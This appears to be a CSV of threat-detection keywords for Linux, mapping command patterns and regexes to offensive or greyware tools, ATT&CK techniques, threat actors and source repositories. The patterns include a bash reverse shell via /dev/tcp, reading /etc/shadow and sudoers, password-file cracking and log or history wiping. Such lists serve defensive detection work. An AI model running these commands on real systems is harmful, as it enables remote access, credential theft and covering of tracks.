"*bash -i >& /dev/tcp/*/* 0>&1*",".{0,1000}bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1.{0,1000}","greyware_tool_keyword","bash","bash reverse shell","T1071 - T1071.004 - T1021","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","#linux","N/A","10","10","1445","187","2024-11-18T14:07:04Z","2021-08-16T17:34:25Z"
"*bash -i >& /dev/tcp/*/* 0>&1*",".{0,1000}bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1.{0,1000}","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","#linux","greyware tool - risks of False positive !","10","10","61798","14749","2024-12-04T11:10:42Z","2016-10-18T07:29:07Z"
"*bash lse.sh*",".{0,1000}bash\slse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3457","574","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z"
"*bash_executor *",".{0,1000}bash_executor\s.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","#linux","N/A","10","10","49","10","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z"
"*BASH_HISTORY=/dev/null exec -a *",".{0,1000}BASH_HISTORY\=\/dev\/null\sexec\s\-a\s.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","#linux","N/A","9","3","216","22","2024-12-01T21:19:51Z","2024-07-16T15:56:11Z"
"*bash_read_line_reverse_tcp.py*",".{0,1000}bash_read_line_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3830","613","2024-11-05T17:50:18Z","2022-10-25T22:02:59Z"
"*bashfuscator -*",".{0,1000}bashfuscator\s\-.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","#linux","N/A","10","10","1670","183","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z"
"*Bashfuscator Team*",".{0,1000}Bashfuscator\sTeam.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","#linux","N/A","10","10","1670","183","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z"
"*bashfuscator.py*",".{0,1000}bashfuscator\.py.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","#linux","N/A","10","10","1670","183","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z"
"*Bashfuscator-master*",".{0,1000}Bashfuscator\-master.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","#linux","N/A","10","10","1670","183","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z"
"*bashRCPersistence*",".{0,1000}bashRCPersistence.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*blitz /* */etc/*",".{0,1000}blitz\s\/.{0,1000}\s.{0,1000}\/etc\/.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","9","10","1549","132","2024-12-05T00:41:10Z","2020-09-18T16:14:22Z"
"*build -o LastenServer*",".{0,1000}build\s\-o\sLastenServer.{0,1000}","offensive_tool_keyword","Lastenzug","Socka4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","0","#linux","N/A","10","10","213","31","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z"
"*build_onionpipe.bash*",".{0,1000}build_onionpipe\.bash.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","#linux","N/A","10","6","528","31","2024-12-05T16:20:35Z","2022-01-23T06:52:13Z"
"*build_tor_darwin.bash*",".{0,1000}build_tor_darwin\.bash.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","#linux","N/A","10","6","528","31","2024-12-05T16:20:35Z","2022-01-23T06:52:13Z"
"*build_tor_debian.bash*",".{0,1000}build_tor_debian\.bash.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","#linux","N/A","10","6","528","31","2024-12-05T16:20:35Z","2022-01-23T06:52:13Z"
"*byakugan/bin/*",".{0,1000}byakugan\/bin\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","#linux","N/A","10","10","34357","14025","2024-12-07T15:05:00Z","2011-08-30T06:13:20Z"
"*C34208EA-8C33-473D-A9B4-53FB40347EA0*",".{0,1000}C34208EA\-8C33\-473D\-A9B4\-53FB40347EA0.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#GUIDproject #linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*cat *.bash_history*",".{0,1000}cat\s.{0,1000}\.bash_history.{0,1000}","greyware_tool_keyword","cat","show bash history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","#linux","N/A","2","9","N/A","N/A","N/A","N/A"
"*cat *.bash_history*",".{0,1000}cat\s.{0,1000}\.bash_history.{0,1000}","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","#linux","N/A","N/A","10","1445","187","2024-11-18T14:07:04Z","2021-08-16T17:34:25Z"
"*cat *bash-history*",".{0,1000}cat\s.{0,1000}bash\-history.{0,1000}","greyware_tool_keyword","cat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*cat ./apache-tomcat-8.5.77/webapps/ROOT/tomcatwar.jsp",".{0,1000}cat\s\.\/apache\-tomcat\-8\.5\.77\/webapps\/ROOT\/tomcatwar\.jsp","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/Mr-xn/spring-core-rce","1","0","#linux","N/A","N/A","1","51","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z"
"*cat /dev/null > *bash_history*",".{0,1000}cat\s\/dev\/null\s\>\s.{0,1000}bash_history.{0,1000}","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","#linux","greyware tool - risks of False positive !","10","10","9917","2830","2024-12-03T04:36:14Z","2017-10-11T17:23:32Z"
"*cat /dev/null > /var/log/*.log*",".{0,1000}cat\s\/dev\/null\s\>\s\/var\/log\/.{0,1000}\.log.{0,1000}","greyware_tool_keyword","cat","deleting log files","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","#linux","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*cat /dev/null > /var/log/auth.log*",".{0,1000}cat\s\/dev\/null\s\>\s\/var\/log\/auth\.log.{0,1000}","greyware_tool_keyword","cat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*cat /dev/null > ~/.bash_history*",".{0,1000}cat\s\/dev\/null\s\>\s\~\/\.bash_history.{0,1000}","greyware_tool_keyword","cat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"* --show passwd*",".{0,1000}\s\-\-show\spasswd.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","#linux","N/A","N/A","10","10431","2114","2024-12-05T02:30:14Z","2011-12-16T19:43:47Z"
"*cat /etc/shadow*",".{0,1000}cat\s\/etc\/shadow.{0,1000}","greyware_tool_keyword","cat","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*cat /etc/sudoers*",".{0,1000}cat\s\/etc\/sudoers.{0,1000}","greyware_tool_keyword","cat","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*catspin.sh http*",".{0,1000}catspin\.sh\shttp.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","#linux","N/A","9","3","255","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z"
"*catspin.sh -info*",".{0,1000}catspin\.sh\s\-info.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","#linux","N/A","9","3","255","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z"
"*catspin.sh -kill*",".{0,1000}catspin\.sh\s\-kill.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","#linux","N/A","9","3","255","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z"
"*catspin.sh -run *",".{0,1000}catspin\.sh\s\-run\s.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","#linux","N/A","9","3","255","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z"
"*cbeecb2981c75b8f066b1f04f19f2095bdcf22f19d0d3f1099b83963547c00cb","cbeecb2981c75b8f066b1f04f19f2095bdcf22f19d0d3f1099b83963547c00cb","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*cd ./whereami/*",".{0,1000}cd\s\.\/whereami\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/whereami","1","0","#linux","N/A","10","10","160","28","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z"
"*unshadow /etc/passwd*",".{0,1000}unshadow\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","#linux","N/A","N/A","10","10431","2114","2024-12-05T02:30:14Z","2011-12-16T19:43:47Z"
"*chattr +i *.bash_history*",".{0,1000}chattr\s\+i\s.{0,1000}\.bash_history.{0,1000}","greyware_tool_keyword","chattr","lock out the ability to update the file","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","#linux","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*unshadow passwd shadow*",".{0,1000}unshadow\spasswd\sshadow.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","#linux","N/A","N/A","10","10431","2114","2024-12-05T02:30:14Z","2011-12-16T19:43:47Z"
"*chattr -ia */etc/shadow*",".{0,1000}chattr\s\-ia\s.{0,1000}\/etc\/shadow.{0,1000}","greyware_tool_keyword","chattr","changes the permissions and attributes of sensibles files","T1222.001 - T1222.002","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","#linux","N/A","9","10","N/A","N/A","N/A","N/A"
"*chattr -ia */etc/sudoers*",".{0,1000}chattr\s\-ia\s.{0,1000}\/etc\/sudoers.{0,1000}","greyware_tool_keyword","chattr","changes the permissions and attributes of sensibles files","T1222.001 - T1222.002","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","#linux","N/A","9","10","N/A","N/A","N/A","N/A"
"*/etc/passwd*/.sudo_as_admin_successful*",".{0,1000}\/etc\/passwd.{0,1000}\/\.sudo_as_admin_successful.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3457","574","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z"
"*chmod +x dirty*",".{0,1000}chmod\s\+x\sdirty.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/febinrev/dirtypipez-exploit","1","0","#linux","N/A","N/A","1","49","24","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z"
"*chmod +x evil.php*",".{0,1000}chmod\s\+x\sevil\.php.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","#linux","N/A","7","10","2323","385","2024-12-07T02:28:34Z","2020-05-13T11:28:52Z"
"*chmod +x pwnkit*",".{0,1000}chmod\s\+x\spwnkit.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a  web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","#linux","N/A","10","10","106","50","2024-09-29T18:27:05Z","2022-07-15T05:51:04Z"
"*chmod +x XiebroC2MAc*",".{0,1000}chmod\s\+x\sXiebroC2MAc.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#linux","N/A","10","10","1038","158","2024-12-05T11:35:26Z","2024-02-15T15:46:07Z"
"*chmod 4777 /tmp/.scsi/dev/bin/gsh*",".{0,1000}chmod\s4777\s\/tmp\/\.scsi\/dev\/bin\/gsh.{0,1000}","greyware_tool_keyword","tmpwatch","Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time","T1070.004 - T1059 - T1047","TA0007 - TA0002 - TA0040","N/A","N/A","Malware","https://linux.die.net/man/8/tmpwatch","1","0","#linux","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*chmod 666 /var/run/utmp~*",".{0,1000}chmod\s666\s\/var\/run\/utmp\~.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file  Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","#linux","N/A","N/A","10","4099","2069","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z"
"*chmod 700 duck.sh*",".{0,1000}chmod\s700\sduck\.sh.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","0","#linux","N/A","5","10","N/A","N/A","N/A","N/A"
"*chmod 700 lse.sh*",".{0,1000}chmod\s700\slse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3457","574","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z"
"*chmod 700 nscd crond*",".{0,1000}chmod\s700\snscd\scrond.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers - EncTelnet/Poptop To use Nopen over an existing connection","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/thePevertedSpartan/EQ1/blob/0c2354ff1073099b2aa417030b3167ec29d7279c/Linux/doc/old/etc/user.tool.poptop.COMMON","1","0","#linux","N/A","N/A","1","0","1","2017-11-12T08:13:06Z","2017-11-12T08:10:08Z"
"*chmod 755 lse.sh*",".{0,1000}chmod\s755\slse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3457","574","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z"
"*chmod 755 msfinstall*",".{0,1000}chmod\s755\smsfinstall.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","https://x.com/mthcht/status/1827714529687658796","10","10","34357","14025","2024-12-07T15:05:00Z","2011-08-30T06:13:20Z"
"*chown boringproxy:boringproxy *",".{0,1000}chown\sboringproxy\:boringproxy\s.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#linux","N/A","10","10","1233","117","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*chown crowbar:crowbar *",".{0,1000}chown\scrowbar\:crowbar\s.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","Dispossessor","C2","https://github.com/q3k/crowbar","1","0","#linux","N/A","10","10","475","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*chown root %s  chmod 4755 %s  %s*",".{0,1000}chown\sroot\s\%s\s\schmod\s4755\s\%s\s\s\%s.{0,1000}","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Exploitation tool","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*chown root:root /tmp/.scsi/dev/bin/*",".{0,1000}chown\sroot\:root\s\/tmp\/\.scsi\/dev\/bin\/.{0,1000}","greyware_tool_keyword","tmpwatch","Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time","T1070.004 - T1059 - T1047","TA0007 - TA0002 - TA0040","N/A","N/A","Malware","https://linux.die.net/man/8/tmpwatch","1","0","#linux","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*--chown=nonroot /go/src/github.com/cloudflare/cloudflared/cloudflared /usr/local/bin/*",".{0,1000}\-\-chown\=nonroot\s\/go\/src\/github\.com\/cloudflare\/cloudflared\/cloudflared\s\/usr\/local\/bin\/.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider* - Gamaredon - TA4557 - FIN6","C2","https://github.com/cloudflare/cloudflared","1","0","#linux","N/A","10","10","9418","838","2024-12-06T13:05:17Z","2017-10-13T19:54:47Z"
"*chsh -s /bin/false ehorus*",".{0,1000}chsh\s\-s\s\/bin\/false\sehorus.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*CiscoCXSecurity/linikatz*",".{0,1000}CiscoCXSecurity\/linikatz.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
